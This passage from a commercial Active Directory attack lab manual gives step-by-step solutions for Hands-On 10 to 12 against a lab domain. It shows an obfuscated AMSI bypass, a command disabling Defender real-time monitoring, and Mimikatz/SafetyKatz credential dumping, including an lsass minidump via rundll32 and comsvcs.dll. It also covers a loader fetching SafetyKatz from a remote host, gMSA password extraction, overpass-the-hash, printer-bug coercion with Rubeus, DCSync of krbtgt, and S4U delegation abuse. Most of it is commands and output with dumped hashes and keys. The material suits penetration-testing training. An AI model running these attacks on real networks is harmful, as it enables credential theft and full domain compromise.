C:\AD\Tools>winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.]

"bitsadmin /transfer WindowsUpdates /priority normal
http://127.0.0.1:8080/Loader.exe C:\\Users\\Public\\Loader.exe"

If you get an error like ' Unable to add file - 0x800704dd

The operation being requested was not performed because the user has not
logged on to the network. The specified service does not exist.', then you may like
to use xcopy to copy the loader.

PowerShell Remoting and Invoke-Mimi

We will use Invoke-Mimi on us-mailmgmt to extract credentials.

PS C:\AD\Tools> $passwd = ConvertTo-SecureString 't7HoBF+m]ctv.]' -

We need to disable AMSI for the PSSession so that we can use the stock Invoke-Mimi.ps1 script. To
avoid disabling AMSI, you can use modified Invoke-Mimi instead:

PS C:\AD\Tools> Enter-PSSession $mailmgmt

[us-mailmgmt]: PS C:\Users\Administrator\Documents> SèT-Itèm ( 'V'+'aR' +
'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ;
( Get-varIÀ`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ssÈmbly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${nÙLl},${t`RuE} )
[us-mailmgmt]: PS C:\Users\Administrator\Documents> exit
PS C:\AD\Tools>

Now, load Invoke-Mimi in the remote session and execute it to extract the secrets. Note that we have
already disabled AMSI for this PSSession:

PS C:\AD\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session

$mailmgmt
PS C:\AD\Tools> Enter-PSSession $mailmgmt
[us-mailmgmt]: PS C:\Users\Administrator\Documents> Invoke-Mimi -Command
'"sekurlsa::keys"'

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 42

.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::keys

Authentication Id : 0 ; 44772476 (00000000:02ab2c7c)

Session : Service from 0
User Name : provisioningsvc
Domain : US
Logon Server : US-DC
Logon Time : 11/5/2021 4:52:05 AM
SID : S-1-5-21-210670787-2521448726-163245708-8602

[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 43

Hands-On 10:
Task
• Enumerate gMSAs in the us.techcorp.local domain.
• Enumerate the principals that can read passwords from any gMSAs.
• Compromise one such principal and retrieve the password from a gMSA.
• Find if the gMSA has high privileges on any machine and extract credentials from that machine.

Solution
To enumerate gMSAs, we can use the ADModule

C:\Users\studentuserx>cd C:\AD\Tools

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-

master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1

PS C:\AD\Tools> Get-ADServiceAccount -Filter *

DistinguishedName : CN=jumpone,CN=Managed Service

Accounts,DC=us,DC=techcorp,DC=local
Enabled : True
Name : jumpone
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 1ac6c58e-e81d-48a8-bc42-c768d0180603
SamAccountName : jumpone$
SID : S-1-5-21-210670787-2521448726-163245708-8601
UserPrincipalName :

Enumerate the Principals that can read the password blob:

PS C:\AD\Tools> Get-ADServiceAccount -Identity jumpone -Properties * | select

PrincipalsAllowedToRetrieveManagedPassword

PrincipalsAllowedToRetrieveManagedPassword
------------------------------------------
{CN=provisioning svc,CN=Users,DC=us,DC=techcorp,DC=local}

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 44

Sweet! Recall that we got secrets of provisioning svc from us-mailmgmt. Start a new process as the
provisioningsvc user. Run the below command from an elevated cmd shell:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:provisioningsvc /domain:us.techcorp.local
/aes256:a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a
/run:cmd.exe" "exit"
[snip]

In the new cmd session, run the following commands to get the password blob and:

Using the DSInternals module, lets decode the password and convert it to NTLM hash (as the clear-text
password is not writable)

PS C:\Windows\system32> Import-Module
C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
PS C:\Windows\system32> $decodedpwd = ConvertFrom-ADManagedPasswordBlob
$Passwordblob
PS C:\Windows\system32> ConvertTo-NTHash –Password
$decodedpwd.SecureCurrentPassword
0a02c684cc0fa1744195edd1aec43078

Now we can start a new process with the privileges of jumpone:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:jumpone /domain:us.techcorp.local
/ntlm:0a02c684cc0fa1744195edd1aec43078 /run:cmd.exe" "exit"
[snip]

Check for admin privileges on a machine in the target domain. Run the below commands in the process
running with privileges of jumpone:

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 45

Sweet! We have administrative access to US-Jump machine as jumpone. We can now access us-jump
using winrs or PowerShell Remoting

Use winrs to access us-jump

We can access us-jump using winrs. In the process running as jumpone that we started above:

PS C:\Windows\system32>winrs -r:us-jump cmd

C:\Users\jumpone$>whoami
whoami
us\jumpone$

C:\Users\jumpone$>exit

Let's use Loader.exe to run SafetyKatz on us-jump

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\us-

jump\C$\Users\Public\Loader.exe /Y
Does \\us-jump\C$\Users\Public\Loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Loader.exe
1 File(s) copied

C:\Windows\system32>winrs -r:us-jump cmd

C:\Users\jupmone$>C:\Users\Public\Loader.exe -path
http://192.168.100.x/SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://192.168.100.x/SafetyKatz.exe
The system cannot execute the specified program.

So, we can't run binaries!

Let's try with Invoke-Mimi using PowerShell. First, we need to bypass AMSI:

C:\Users\jumpone$>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\jumpone$> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') +

('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (
('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 46

"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${nÙLl},${t`RuE} )
SèT-Itèm ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( Get-varIÀ`BLE ( ('1Q'+'2U') +'zX' ) -
VaL )."A`ssÈmbly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${nÙLl},${t`RuE} )
Cannot invoke method. Method invocation is supported only on core types in
this language mode.
At line:1 char:106
+ ... ) ) ; ( Get-varIÀ`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`
...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId :
MethodInvocationNotSupportedInConstrainedLanguage

PowerShell seems to be running in the Constrained Language Mode.

PS C:\Users\jumpone$> $ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

This could be a result of application allowlist/whitelist. Let's check that!

Applocker policies are stored in Registry. Let's query the registry on us-jump, if we get an error that
means Applocker is not in use. Note that the below command assumes that reg.exe is allowed to run.
We could also use PowerShell's Get-AppLockerPolicy –Effective command:

C:\Users\jumpone$>reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
ERROR:
The system was unable to find the specified registry key or value.

We can check for WDAC using WMI. Let's try using wmic on us-jump:

C:\Users\jumpone$>wmic
wmic
The system cannot execute the specified program.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 47

Looks like wmic is blocked too. We need to rely on the PowerShell cmdlet for WDAC detection:

C:\Users\jumpone$> powershell
PS C:\Users\jumpone$> Get-CimInstance -ClassName Win32_DeviceGuard -Namespace
root\Microsoft\Windows\DeviceGuard
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace
root\Microsoft\Windows\DeviceGuard

AvailableSecurityProperties : {1, 2, 3, 5}
CodeIntegrityPolicyEnforcementStatus : 2
InstanceIdentifier : 4ff40742-2649-41b8-bdd1-
e80fad1cce80
RequiredSecurityProperties : {0}
SecurityServicesConfigured : {0}
SecurityServicesRunning : {0}
UsermodeCodeIntegrityPolicyEnforcementStatus : 2
Version : 1.0
VirtualizationBasedSecurityStatus : 0
PSComputerName :

So, WDAC is running in the Code Integrity enforced and that is the reason PowerShell is running in the
Constrained Language Mode (CLM). Note that this will not allow Invoke-Mimi and most of the Offensive
PowerShell tools to run.

We now need to find a way around the application whitelisting. There are a couple of options discussed
below but feel free to explore ways of bypassing WDAC. Try Microsoft signed Binaries and Scripts (See
the LOLBAS project - https://lolbas-project.github.io/) to check if the policy applied in the lab is
complete (it is not!).

You will find out that rundll32.exe is not blocked as blocking that interferes in the proper functioning of
the target server (which is a VM). Please keep this in mind whenever you try to bypass a whitelisting
solution. In every enterprise, legit executables have to be allowed and that is what we make use of.
We can use the following command to extract credentials from lsass using rundll32.exe. Both
rundll32.exe and comsvcs.dll are Microsoft signed. We are creating a memory dump of the lsass process
and we will parse it offline on the student VM. Since the comsvcs.dll based memory dump is detected by
Defender we will need to disable Defender by executing “Set-MpPreference -
DisableRealtimeMonitoring $true” command. A combination of WDAC, and Defender with
correct policies and configuration makes it very difficult for attackers to compromise the machine or
perform post-exploitation actions on the target machine.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 48

Please note that '708' in the below command is the PID of lsass.exe process and may be different for
you:

C:\Users\jumpone$>tasklist /FI "IMAGENAME eq lsass.exe"

tasklist /FI "IMAGENAME eq lsass.exe"

Image Name PID Session Name Session# Mem Usage

========================= ======== ================ =========== ============
lsass.exe 708 Services 0 17,844 K

C:\Users\jumpone$>rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708

C:\Users\Public\lsass.dmp full
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708
C:\Users\Public\lsass.dmp full

C:\Users\jumpone$>dir C:\Users\Public\lsass.dmp
dir C:\Users\Public\lsass.dmp
Volume in drive C has no label.
Volume Serial Number is 88AD-6C8B

Directory of C:\Users\Public

01/13/2021 07:31 AM 46,771,786 lsass.dmp

[snip]
C:\Users\jumpone$>exit
exit

Now, copy the lsass.dmp to the student VM. Use the below commands in the process running as
jumpone:

C:\Windows\system32>echo F | xcopy \\us-jump\C$\Users\Public\lsass.dmp

C:\AD\Tools\lsass.dmp
Does C:\AD\Tools\lsass.dmp specify a file name
or directory name on the target
(F = file, D = directory)? F
\\us-jump\C$\Users\Public\lsass.dmp
1 File(s) copied

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 49

Note that if we had RDP access to us-jump, we could also use the Task Manager to dump lsass from us-
jump. The biggest drawback is that it needs RDP access to the target server and clear-text credentials:

After copying the lsass.DMP to our machine, let's use Mimikatz to extract credentials from it. Remember
to run mimikatz.exe with administrative privileges:

.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26

mimikatz # sekurlsa::minidump C:\AD\Tools\lsass.DMP

Switch to MINIDUMP : 'C:\AD\Tools\lsass.DMP'

mimikatz # privilege::debug
Privilege '20' OK

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 50

mimikatz # sekurlsa::keys
Opening : 'C:\AD\Tools\lsass.DMP' file for minidump...

Authentication Id : 0 ; 73197 (00000000:00011ded)

Session : Service from 0
User Name : appsvc
Domain : US
Logon Server : US-DC
Logon Time : 9/23/2021 11:30:42 PM
SID : S-1-5-21-210670787-2521448726-163245708-4601

*
Username : appsvc
*
Domain : US.TECHCORP.LOCAL
*
Password : (null)
*
Key List :
aes256_hmac
b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
rc4_hmac_nt 1d49d390ac01d568f0ee9be82bb74d4c
rc4_hmac_old 1d49d390ac01d568f0ee9be82bb74d4c
rc4_md4 1d49d390ac01d568f0ee9be82bb74d4c
rc4_hmac_nt_exp 1d49d390ac01d568f0ee9be82bb74d4c
rc4_hmac_old_exp 1d49d390ac01d568f0ee9be82bb74d4c

[snip]

Authentication Id : 0 ; 765003 (00000000:000bac4b)

Session : Service from 0
User Name : webmaster
Domain : US
Logon Server : US-DC
Logon Time : 9/24/2021 12:01:17 AM
SID : S-1-5-21-210670787-2521448726-163245708-1140

*
Username : webmaster
*
Domain : US.TECHCORP.LOCAL
*
Password : (null)
*
Key List :
aes256_hmac
2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
rc4_hmac_nt 23d6458d06b25e463b9666364fb0b29f
rc4_hmac_old 23d6458d06b25e463b9666364fb0b29f
rc4_md4 23d6458d06b25e463b9666364fb0b29f
rc4_hmac_nt_exp 23d6458d06b25e463b9666364fb0b29f
rc4_hmac_old_exp 23d6458d06b25e463b9666364fb0b29f

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 51

Note that we found out that reg.exe is allowed on the machine. In other scenarios, that will help in
getting local user creds, machine account hash and Domain Cached Credentials from the registry!

We may also like to check if there are any Certificates that we can extract. For that, we will use
PowerShell to check Certificate store of LocalMachine and users.

Let's check certificate store LocalMachine on us-jump. We will copy InvisiShell on the machine to avoid
PowerShell logging. Run the following commands on the student machine in a process running as
jumpone:

C:\Windows\System32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\us-
jump\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y

C:\Windows\System32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll

\\us-jump\C$\Users\Public\InShellProf.dll /Y

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 52

Connect to us-jump and run InvisiShell:

C:\Windows\System32>winrs -r:us-jump cmd

C:\Users\jumpone$>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

In the PowerShell session that starts, run the following command to list all the certificates for
LocalMachine in the certificate store. Note that our ability to use tools like Mimikatz to export
certificates is limited by present of WDAC on us-jump:

PS C:\Users\jumpone$> ls cert:\LocalMachine\My
ls cert:\LocalMachine\My
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint Subject
---------- -------
BAD78F43BB4CB13C4843E49B51AA051530FFBBDB [email protected],
CN=pawadmin, CN=Users, DC=us, DC=techcorp, DC=l

We have a certificate for the user pawadmin in the store! Let's try to export it:

PS C:\Users\jumpone$> ls
cert:\LocalMachine\My\BAD78F43BB4CB13C4843E49B51AA051530FFBBDB | Export-
PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-
SecureString -String 'SecretPass@123' -Force -AsPlainText)
ls cert:\LocalMachine\My\BAD78F43BB4CB13C4843E49B51AA051530FFBBDB | Export-
PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-
SecureString -String 'SecretPass@123' -Force -AsPlainText)

Directory: C:\Users\Public

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 11/8/2021 8:25 AM 4713 pawadmin.pfx
PS C:\Users\jumpone$> exit
exit

C:\Users\jumpone$>set COR_ENABLE_PROFILING=

C:\Users\jumpone$>set COR_PROFILER=

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 53

C:\Users\jumpone$>REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-299b-
5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\Users\jumpone$>exit
exit

C:\Windows\system32>

Copy the certificate to the student VM:

C:\Windows\system32>echo F | xcopy \\us-jump\C$\Users\Public\pawadmin.pfx

C:\AD\Tools\pawadmin.pfx
Does C:\AD\Tools\pawadmin.pfx specify a file name
or directory name on the target
(F = file, D = directory)? F
\\us-jump\C$\Users\Public\pawadmin.pfx
1 File(s) copied

We will use this certificate later!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 54

Hands-On 11:
Task
• Find a server in US domain where Unconstrained Delegation is enabled.
• Compromise that server and get Domain Admin privileges.

Solution
First, we need to find out the machines in us.techcorp.local with unconstrained delegation. We can use
PowerView or Active Directory module for that. Using the ActiveDirectory module:

PS C:\AD\Tools> Get-ADComputer -Filter {TrustedForDelegation -eq $True}

DistinguishedName : CN=US-DC,OU=Domain Controllers,DC=us,DC=techcorp,DC=local
DNSHostName : US-DC.us.techcorp.local
Enabled : True
Name : US-DC
ObjectClass : computer
ObjectGUID : 2edf59cf-aa6e-448a-9810-7a81a3d3af16
SamAccountName : US-DC$
SID : S-1-5-21-210670787-2521448726-163245708-1000
UserPrincipalName :

DistinguishedName : CN=US-WEB,CN=Computers,DC=us,DC=techcorp,DC=local
DNSHostName : US-Web.us.techcorp.local
Enabled : True
Name : US-WEB
ObjectClass : computer
ObjectGUID : cb00dc1e-3619-4187-a02b-42f9c964a637
SamAccountName : US-WEB$
SID : S-1-5-21-210670787-2521448726-163245708-1110

Please note the DCs always have unconstrained delegation enabled. So, we need to compromise us-
web. Recall that we got credentials of webmaster in the previous hands-on. Let's check if that user has
administrative access to us-web. We will use OverPass-The-Hash attack to use webmaster's AES keys
using SafetyKatz. You can use other tools of your choice. Run the below from an elevated shell:

C:\Windows\system32>C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe
"sekurlsa::opassth /user:webmaster /domain:us.techcorp.local
/aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
/run:cmd.exe" "exit"

[*] Dumping lsass (704) to C:\Windows\Temp\test.txt

[+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####. mimikatz 2.2.0 (x64) #19041 Dec 18 2020 22:37:12

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 55

## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::opassth /user:webmaster

/domain:us.techcorp.local
/aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
/run:cmd.exe
user : webmaster
domain : us.techcorp.local
program : cmd.exe
impers. : no
AES256 : 2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
| PID 2852
| TID 3900
| LSA Process is now R/W
| LUID 0 ; 69532048 (00000000:0424f990)
\_ msv1_0 - data copy @ 000001845BC37D30 : OK !
\_ kerberos - data copy @ 000001845BDB3298
\_ aes256_hmac OK
\_ aes128_hmac -> null
\_ rc4_hmac_nt -> null
\_ rc4_hmac_old -> null
\_ rc4_md4 -> null
\_ rc4_hmac_nt_exp -> null
\_ rc4_hmac_old_exp -> null
\_ *Password replace @ 000001845BD10388 (32) -> null

mimikatz(commandline) # exit
Bye!
[snip]

In the newly spawned process, use Find-PSRemotingLocalAdminAccess after loading InvisiShell:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> cd C:\AD\Tools\
PS C:\AD\Tools> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess -Verbose
VERBOSE: Trying to run a command parallely on provided computers list using
PSRemoting .
US-Web
PS C:\AD\Tools> exit

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 56

Great! We have administrative access to us-web using webmaster's credentials. Now, we will use the
printer bug to force us-dc to connect to us-web. Let's first copy Rubeus.exe to us-web and start
monitoring for any authentication from us-dc.

We can use multiple methods to copy Rubeus like xcopy, PowerShell Remoting etc.

Copy Rubeus using xcopy and execute using winrs

From the process running as webmaster:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-

web\C$\Users\Public\Rubeus.exe /Y
Does \\us-web\C$\Users\Public\Rubeus.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Rubeus.exe
1 File(s) copied
C:\Windows\system32>winrs -r:us-web cmd.exe
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\webmaster>C:\Users\Public\Rubeus.exe monitor /targetuser:US-DC$

/interval:5 /nowrap
C:\Users\Public\Rubeus.exe monitor /targetuser:US-DC$ /interval:5 /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring

[*] Target user : US-DC$
[*] Monitoring every 5 seconds for new TGTs

Copy and execute Rubeus using PowerShell Remoting

From the process running as webmaster:

PS C:\AD\Tools> $usweb1 = New-PSSession us-web

PS C:\AD\Tools> Copy-Item -ToSession $usweb1 -Path C:\AD\Tools\Rubeus.exe -
Destination C:\Users\Public
PS C:\AD\Tools> Enter-PSSession $usweb1
[us-web]: PS C:\Users\webmaster\Documents> cd C:\Users\Public
[us-web]: PS C:\Users\webmaster\Downloads> .\Rubeus.exe monitor
/targetuser:US-DC$ /interval:5 /nowrap

______ _

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 57

(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring

[*] Target user : US-DC$
[*] Monitoring every 5 seconds for new TGTs

Using either of the above methods, once we have Rubeus running in the monitor mode, we can start
MS-RPRN.exe to force connect us-dc to us-web and thereby abuse the printer bug:

C:\Users\studentuserx>C:\AD\Tools\MS-RPRN.exe \\us-dc.us.techcorp.local \\us-

web.us.techcorp.local
Attempted printer notification and received an invalid handle. The coerced
authentication probably worked!

On the session where Rubeus is running, we can see:

[snip]
[*] 1/14/2021 9:51:57 AM UTC - Found new TGT:

User : [email protected]
StartTime : 1/13/2021 8:08:07 PM
EndTime : 1/14/2021 6:07:42 AM
RenewTill : 12/31/1969 4:00:00 PM
Flags : name_canonicalize, pre_authent, forwarded,
forwardable
Base64EncodedTicket :

doIFKTCCBSWgAwIBBaEDAg
[snip]

Copy the Base64EncodedTicket, remove unnecessary spaces and newline (is any) and use the ticket with
Rubes on the Student VM.

PS C:\AD\Tools> C:\AD\Tools\Rubeus.exe ptt /ticket:TGTofUS-DC$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 58

[*] Action: Import Ticket
[+] Ticket successfully imported!

We can now run DCSync attack against US-DC using the injected ticket:

C:\Users\studentuserx>C:\AD\Tools\SharpKatz.exe --Command dcsync --User

us\krbtgt --Domain us.techcorp.local --DomainController us-
dc.us.techcorp.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] us.techcorp.local will be the domain
[!] us-dc.us.techcorp.local will be the DC server
[!] us\krbtgt will be the user account
[*]
[*] Object RDN : krbtgt
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : krbtgt
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : ACCOUNTDISABLE, NORMAL_ACCOUNT
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/5/2019 12:49:17 AM
[*] Object Security ID : S-1-5-21-210670787-2521448726-163245708-502
[*] Object Relative ID : 502
[*]
[*] Credents:
[*] Hash NTLM : b0975ae49f441adc6b024ad238935af5
[*] ntlm- 0 : b0975ae49f441adc6b024ad238935af5
[*] lm - 0 : d765cfb668ed3b1f510b8c3861447173
[*]
[*] Supplemental Credents:
[*]
[*] * Primary:NTLM-Strong-NTOWF
[*] Random Value : 819a7c8674e0302cbeec32f3f7b226c9
[*]
[*] * Primary:Kerberos-Newer-Keys
[*] Default Salt :US.TECHCORP.LOCALkrbtgt

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 59

[*] Credents
[*] aes256_hmac 4096:
5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
[*] aes128_hmac 4096: 1bae2a6639bb33bf720e2d50807bf2c1
[*] des_cbc_md5 4096: 923158b519f7a454
[*] ServiceCredents
[*] OldCredents
[*] OlderCredents
[snip]

We can run the DCSync attack using Invoke-Mimi or any other tool too.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 60

Hands-On 12:
Task
• Abuse Constrained delegation in us.techcorp.local to escalate privileges on a machine to Domain
Admin.

Solution
Enumerate the objects in our current domain that have constrained delegation enabled with the help of
the Active Directory module from InvisiShell:

PS C:\AD\Tools> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -

Properties msDS-AllowedToDelegateTo

DistinguishedName : CN=appsvc,CN=Users,DC=us,DC=techcorp,DC=local
msDS-AllowedToDelegateTo : {CIFS/us-mssql.us.techcorp.local, CIFS/us-mssql}
Name : appsvc
ObjectClass : user
ObjectGUID : 792eeddd-5d62-4b4f-bff7-23475d665474

Recall that we extracted credentials of appsvc from us-jump, let’s use the AES256 keys for appsvc to
impersonate the domain administrator - administrator and access us-mssql using those privileges. Note
that we request an alternate ticket for HTTP service to be able to use WinRM.

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe s4u /user:appsvc

/aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
/impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local
/altservice:HTTP /domain:us.techcorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
[*] Building AS-REQ (w/ preauth) for: 'us.techcorp.local\appsvc'
[+] TGT request successful!
[*] base64(ticket.kirbi):
[snip]
[*] Action: S4U

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 61

[*] Using domain controller: US-DC.us.techcorp.local (192.168.1.2)
[*] Building S4U2self request for: '[email protected]'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '[email protected]'
[*] base64(ticket.kirbi):
[snip]
[+] Ticket successfully imported!

Check if the ticket is present in the current process:

C:\Users\studentuserx>klist

Current LogonId is 0:0x1575a8a

Cached Tickets: (1)

#0> Client: administrator @ US.TECHCORP.LOCAL

Server: HTTP/us-mssql.us.techcorp.local @ US.TECHCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 1/14/2021 4:00:25 (local)
End Time: 1/14/2021 14:00:25 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

Sweet, let's access us-mssql using winrs. Note that we will have privileges of domain administrator but
that is only limited to us-mssql:

C:\Users\studentuserx>winrs -r:us-mssql.us.techcorp.local cmd.exe

C:\Users\administrator.US>whoami
whoami
us\administrator

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 62

Hands-On 13:
Task
